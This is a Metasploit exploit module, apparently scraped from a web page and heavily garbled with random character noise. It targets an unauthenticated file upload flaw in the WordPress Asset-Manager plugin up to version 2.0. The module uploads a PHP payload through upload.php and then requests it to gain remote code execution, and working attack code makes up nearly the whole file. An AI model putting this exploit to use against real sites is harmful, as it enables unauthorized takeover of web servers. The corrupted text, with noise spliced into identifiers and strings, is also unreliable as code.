) G6 Z; r7 u# a) p##, c; w- z: N) _0 o5 V! e3 |
# This file is part of the Metasploit Framework and may be subject to ( @" `; O) a3 c; T# redistribution and commercial restrictions. Please see the Metasploit $ D+ ^$ D5 }+ s, ~. L* P# O# Framework web site for more information on licensing and terms of use.) k) t( l( J2 y; r; L5 F
# http://metasploit.com/framework/ , f# K7 T* G3 I1 n2 n: i4 s##6 u2 p5 s+ h3 U
/ u5 w0 C A# _/ T z" grequire 'msf/core') `# P& ]/ h) [/ B: [4 i) Y% G
require 'msf/core/exploit/php_exe'' Y) r3 R. I- I+ @
2 I+ S" }& x% W! |0 H4 iclass Metasploit3 < Msf::Exploit::Remote5 @+ |# B+ t+ g9 p8 n( Y+ [
Rank = ExcellentRanking ) z3 @) R z' i$ T# J; V4 K' _. } 9 y6 H, }: S7 o& Z3 {, O
include Msf::Exploit::Remote::HttpClient- x" _8 \+ h9 Z& ?5 W7 P- r8 M
include Msf::Exploit:hpEXE # i+ L1 I7 h/ K; b . Q2 k- ^% |; w; l# o' T! Y def initialize(info = {}) M- W& b# B- j2 T- T% _ super(update_info(info,3 B( `9 w7 y ]- G0 i6 Q2 D' X
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability', f/ r/ V' Q9 Q' h' d/ T 'Description' => %q{% S, @. B0 A. s, w C! g9 K3 f
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress 3 h0 ?! I' u- c7 r( f; h- Y plugin. By abusing the upload.php file, a malicious user can upload a file to a ' T) b3 a) k: T- e temp directory without authentication, which results in arbitrary code execution. 0 @1 L7 _! [$ f z/ H' ~* G },8 K$ J6 g' X& I. g1 ?% G
'Author' => 4 a. O6 R, S# F$ l" I* t [% p* e8 r8 B: Q5 S* e# K( j
'Sammy FORGIT', # initial discovery3 Q# h* ~6 e) f
'James Fitts <fitts.james[at]gmail.com>' # metasploit module p* A* M6 e$ r% {- Y8 j ],; B2 t, P! ]7 @( C5 W4 T
'License' => MSF_LICENSE,: U6 q4 S$ p2 r; Z3 b
'References' => ' u! } q8 @. A9 ` [ 0 L: d3 M1 M. e* u- V8 Z! h3 Q1 y [ 'OSVDB', '82653' ], # K: s! z! Q5 Y) w% R$ W5 m [ 'BID', '53809' ], % L* S9 o2 D' X1 a. `2 D* e( G [ 'EDB', '18993' ],9 }4 e# B& f; G) u4 N
[ 'URL', 'http:// www.myhack58.com /' ] 7 j$ p9 v0 u( V4 v: ?+ \+ d ], 6 G# [, K% r) @5 W 'Payload' => / J; j) V3 W- D3 Y# z) [+ p' J { 8 w& v: N5 O3 X9 K5 a; H3 ? 'BadChars' => "\x00", 5 n/ @9 X+ F6 ~5 G2 }6 s },) N3 k- e* `) n/ d! ^# Y* v: A
'Platform' => 'php', ; @1 G5 n3 W7 r, q5 d- U& e8 P 'Arch' => ARCH_PHP,& @8 N9 b% e5 Q
'Targets' => 9 s/ F A$ x0 g2 v1 M' r [ - s5 ^1 Z6 S/ A6 z% f [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], 4 ?+ M* {. K6 \# a \ [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]% C6 n. T9 I2 h( J. i
],0 ~/ f6 W7 F2 L. u4 _9 z
'DefaultTarget' => 0, . w; {5 v0 Y5 t1 \ u 'DisclosureDate' => 'May 26 2012')) 9 ]4 q* C2 e; E4 o$ k ) L% U( {* T6 I) e; f, v1 P* Q
register_options(0 }- C, F" ^. b7 X* L0 q
[ R3 o9 M. v; `6 ^' o3 P* \$ l+ Q
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']) k! Y0 @5 t( O ], self.class)+ x9 A& w; Z+ y; u7 t8 L
end ( j# \4 ^; P3 g; C& b- z# G, E6 _ ( {/ C2 B2 E$ ]0 G2 b def exploit; J8 ^6 U3 Y9 @5 V2 X8 |3 i) W( V* j, e
uri = target_uri.path ' [8 {" r6 O# s' q9 \ uri << '/' if uri[-1,1] != '/') _: c/ y) U1 c
peer = "#{rhost}:#{rport}" ' J* c% e, C( v) u payload_name = "#{rand_text_alpha(5)}.php" 7 m9 k- r4 [( y4 {0 f php_payload = get_write_exec_payload(:unlink_self=>true)0 n& c$ W& }+ V" Y
* Z! z& z. D. z! W' W" t data = Rex::MIME::Message.new 5 l4 z" s6 l, Z- y, A data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"") ; |3 Z7 R' ^8 y9 M post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') }+ G/ `9 f9 A% ^ $ B: ^5 u9 K5 A( u/ M& W* S. j+ G( l5 ^ print_status("#{peer} - Uploading payload #{payload_name}")8 ?, A4 `9 v# j" v
res = send_request_cgi({ ! D8 R* F8 b; i 'method' => 'POST',7 h3 L- ?% G* S9 z% Q5 N
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php", 2 j7 |# v5 Q3 I2 c 'ctype' => "multipart/form-data; boundary=#{data.bound}",$ `' K& @; w i! I9 \
'data' => post_data' k( x) ~8 D: h5 W
})4 h4 ^0 B; n/ A, C
8 G( n! t. k0 D! g+ Z) | if not res or res.code != 200 or res.body !~ /#{payload_name}/- C% H5 ]* t4 ?( b8 i; w
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") : B" w. F1 [( j9 g" f7 Pend $ s0 i* J: M8 c) ~+ |$ U + ?' O% X* ^( V: H5 k3 t' L3 p& V
print_status("#{peer} - Executing payload #{payload_name}") + B2 e' B$ Y( {. N$ `7 V1 \ U! P8 E res = send_request_raw({) u0 a, g+ i5 K$ s( N/ f
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}", 0 _2 z# G7 ^6 Z 'method' => 'GET': y* j$ B/ G! s# U O6 o, j1 {
}) # I4 }- t6 n! Z3 T % G4 }$ q4 `9 C/ v* M& O3 C& y1 i if res and res.code != 200 ' p% A. x$ m, y# Y$ T; R fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed") 5 p' H; E$ M% G b! _! n4 F end 3 ~) ~' _% w( g1 h4 W end 5 I# L! A! u* E# x# t, z$ ]6 Xend " ?6 D1 o$ {4 N9 e! j